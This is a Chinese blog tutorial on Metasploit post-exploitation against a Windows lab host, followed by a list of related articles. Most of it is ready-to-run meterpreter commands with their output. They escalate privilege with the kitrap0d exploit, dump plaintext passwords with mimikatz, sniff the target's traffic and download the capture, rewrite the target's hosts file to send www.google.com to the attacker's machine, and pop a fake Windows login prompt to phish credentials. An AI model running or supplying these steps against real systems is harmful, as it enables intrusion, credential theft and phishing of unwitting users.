转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86669324

1.用Metasploit提升权限

有时,在使用getsystem提权的时候会失败,此时,我们可以使用后渗透模块将控制权限级别提高至最高级别。这里,我们以Windows Server 2008 SP1操作系统为例,其中,使用本地渗透模块绕过了限制并获得了目标的完全管理权限。

meterpreter > back
msf5 > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 3
msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit

这里,我们使用 exploit/windows/local/ms10_015_kitrap0d 模块提升了控制权限,并获得了最高级别的管理权限。

2.使用mimikatz查找明文密码

mimikatz可以直接从lsass服务获取Windows中状态为活跃的账号的明文密码。

可以在Metasploit中使用load mimikatz命令载入mimikatz模块,之后就可以使用mimikatz模块中的kerberos命令来查找密码。

meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================AuthID   Package    Domain        User             Password
------   -------    ------        ----             --------
0;62769  NTLM       LIUYAZHUANG   lyz
0;997    Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996    Negotiate  NT AUTHORITY  NETWORK SERVICE
0;52356  NTLM
0;999    NTLM       WORKGROUP     LIUYAZHUANG$     meterpreter > 

这里,我删除了密码。

3.使用Metasploit进行流量嗅探

3-1.使用sniffer模块

meterpreter > use sniffer
Loading extension sniffer...Success.

3-2.列出目标主机上的所有网络接口

meterpreter > sniffer_interfaces 1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )meterpreter > 

3-3.启动网络嗅探

meterpreter > sniffer_start
[-] Usage: sniffer_start [interface-id] [packet-buffer (1-200000)] [bpf filter (posix meterpreter only)]
meterpreter >
meterpreter > sniffer_start 1 1000
[*] Capture started on interface 1 (1000 packet buffer)

输入sniffer_start 1 1000命令启动网络接口上的嗅探功能,其中1表示网卡ID,1000是缓冲区的大小。

3-4.下载pcap数据包

meterpreter > sniffer_dump
[-] Usage: sniffer_dump [interface-id] [pcap-file]
meterpreter > sniffer_dump 1 1.pcap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 1000 packets (993284 bytes)
[*] Downloaded 052% (524288/993284)...
[*] Downloaded 100% (993284/993284)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to 1.pcap
meterpreter >

此时,会把1.pcap下载到/root目录下(前提是用root账户登录的Kali)

3-5.使用wireshark查看数据包

root@binghe:~# wireshark 1.pcap 

3-6.停止网络嗅探

meterpreter > sniffer_stop
[-] Usage: sniffer_stop [interface-id]
meterpreter >
meterpreter > sniffer_stop 1
[*] Capture stopped on interface 1
[*] There are 74 packets (14485 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
meterpreter > 

4.使用Metasploit对host文件进行注入

可以通过对目标主机的host文件进行注入展开钓鱼攻击——将制定域名的条目添加到目标主机的host文件中。

meterpreter > background
[*] Backgrounding session 2...
msf5 exploit(windows/http/rejetto_hfs_exec) > sessions -iActive sessions
===============Id  Name  Type                     Information                        Connection--  ----  ----                     -----------                        ----------2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ LIUYAZHUANG  192.168.175.128:4444 -> 192.168.175.130:1056 (192.168.175.130)msf5 exploit(windows/http/rejetto_hfs_exec) > use post/windows/manage/inject_host
msf5 post(windows/manage/inject_host) > show optionsModule options (post/windows/manage/inject_host):Name     Current Setting  Required  Description----     ---------------  --------  -----------DOMAIN                    yes       Domain name for host file manipulation.IP                        yes       IP address to point domain name to.SESSION                   yes       The session to run this module on.msf5 post(windows/manage/inject_host) > set IP 192.168.175.128
IP => 192.168.175.128
msf5 post(windows/manage/inject_host) > set DOMAIN www.google.com
DOMAIN => www.google.com
msf5 post(windows/manage/inject_host) > set SESSION 2
SESSION => 2
msf5 post(windows/manage/inject_host) > exploit[*] Inserting hosts file entry pointing www.google.com to 192.168.175.128..
[+] Done!
[*] Post module execution completed
msf5 post(windows/manage/inject_host) >
msf5 post(windows/manage/inject_host) > sessionsActive sessions
===============Id  Name  Type                     Information                        Connection--  ----  ----                     -----------                        ----------2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ LIUYAZHUANG  192.168.175.128:4444 -> 192.168.175.130:1056 (192.168.175.130)msf5 post(windows/manage/inject_host) >
msf5 post(windows/manage/inject_host) >
msf5 post(windows/manage/inject_host) > sessions -i 2
[*] Starting interaction with 2...meterpreter > 

此时,在目标机的C:/Windows/System32/drivers/etc/hosts文件中多了一行

192.168.175.128  www.google.com

如下图所示:

此时,在目标机上访问http://www.google.com/,结果如下图:

访问的是我们在Kali上配置的页面。

5.登录密码的钓鱼窗口

meterpreter > run post/windows/gather/phish_windows_credentials 

此时,会在目标主机上弹出外观和Windows系统认证弹窗一样的窗口,这个窗口要求受害者必须输入正确的用户名和密码后才能继续正常工作。

如下图所示:

当用户输入了正确的用户名和密码之后,就会在我们的命令行中显示出来,如下图所示:

Metasploit之——高级扩展功能相关推荐

  1. 初学者的Metasploit教程 - 从基础到高级

    Metasploit是使用最广泛的渗透测试工具之一,是一个非常强大的多合一工具,用于执行渗透测试的不同步骤. 文章目录 前言 安装Metasploit 在 Linux 上安装 Metasploit 了 ...

  2. Metasploit入门到高级【第四章】

    来自公粽号:Kali与编程 预计更新 第一章:Metasploit 简介 Metasploit 是什么 Metasploit 的历史和发展 Metasploit 的组成部分 第二章:Kali Linu ...

  3. Android开发中libs包下面的mips、armeabi、armeabi-v7a和x86

    简介 在Android日常的开发过程中有的项目需要引入第三方的库,有时候大家可能会在libs文件夹下看到 mips.armeabi.armeabi-v7a和x86这四个文件夹.那么这三个文件夹下面的包 ...

  4. GPU深度发掘(一)::GPGPU数学基础教程

    GPU深度发掘(一)::GPGPU数学基础教程 作者:Dominik Göddeke                 译者:华文广 Contents 介绍 准备条件 硬件设备要求 软件设备要求 两者选 ...

  5. java消息推送怎么实现_调用钉钉接口实现机器人推送消息

    一.摘要 现实交易中为了能及时了解发明者量化机器人交易状态,有时候我们需要将机器人所执行的交易结果发送到微信.邮箱.短信等等.但每天上百条各种各样的信息,使得对这些信息已经不敏感,导致重要的信息不能及 ...

  6. android的armeabi和armeabi-v7a

    在ANE中如果SDK调用了so库,则需要把so库放到ANE下Android-ARM/lib/armeabi (调试模式)或者 armeabi-v7a(发行模式)下. 可以贴个ADT代码说明问题: // ...

  7. python向钉钉发送本地文件_Python实现向钉钉群发送消息通知

    一 钉钉机器人使用场景 钉钉机器人是钉钉群的高级扩展功能,可以简单实现将第三方服务信息聚合到钉钉群中,实现信息的自动同步,常用场景如下:聚合Github.Gitlab等源码管理服务,实现源码更新同步: ...

  8. 《企业私有云建设指南》-导读

    内容简介 第1章总结性地介绍了云计算的参考架构.典型解决方案架构和涉及的关键技术. 第2章从需求分析入手,详细讲解了私有云的技术选型.资源管理.监控和运维. 第3章从计算.网络.存储资源池等方面讲解了 ...

  9. python发钉钉消息_Python调用钉钉机器人推送消息

    1.创建钉钉机器人 群机器人是钉钉群的高级扩展功能,群机器人可以将第三方服务的信息聚合到群聊中,实现自动化的信息同步: 进入一个钉钉群,点击右上角的"群设置"进入群设置页面: 选择 ...

最新文章

  1. 美媒:人工智能发展五大趋势引期待
  2. UVA 10714 Ants
  3. bwapp之xss(blog)
  4. golang简短变量声明
  5. LeetCode 1122 数组的相对排序-简单-unordered_map容器的应用
  6. 电脑同时安装python2和3_一台电脑上同时安装python2和python3
  7. java adapter 模式_Java设计模式之适配器模式(Adapter模式)介绍
  8. 怎么判断机械硬盘要多大_秋天要多吃芋头,买芋头是买大的还是小的?学学广西大妈怎么买...
  9. 运维自动化之zabbix(添加Graph screen)(3)
  10. Keil μVision4软件简介
  11. Oracle日期函数和转换函数
  12. matlab存储为二进制txt,matlab读取内容为二进制的TXT文件
  13. 二、Linux 教程-基础命令(1~180未完)
  14. 《深度学习入门-基于Python的理论与实现》第四章带读 – 神经网络的学习
  15. 【教程篇】手机卡刷Rom详细教程
  16. 微信小程序 学习第一天
  17. php.ini maxfileuploads,细说PHP高洛峰文件上传类源文件
  18. Vue 项目处理每次发版后要清理浏览器缓存
  19. java tomcat 404配置_在Tomcat中配置404自定义错误页面详解
  20. Netbeans设置语言为英文

热门文章

  1. ubuntu 在线听音乐软件
  2. genymotion 下载模拟器下n久特别慢无法下载进度为0教你用迅雷下载这些虚拟机多爽啊想暂停就暂停
  3. wowtroll是什么种族_计算机是种族主义者是我们的错
  4. 标题党的进步:道字大旗不再扯,美为号召又开张
  5. GPS和北斗导航都能被欺骗,你还敢用导航吗?
  6. 一个简单的HTTP暴力破解、撞库攻击脚本
  7. 五道口考研之谈,困惑的人好好看看
  8. OPTIMUS — 过程集成与多学科优化平台
  9. 组件分享之后端组件——国际化组件go-i18n
  10. 贪心算法|三角形的最大周长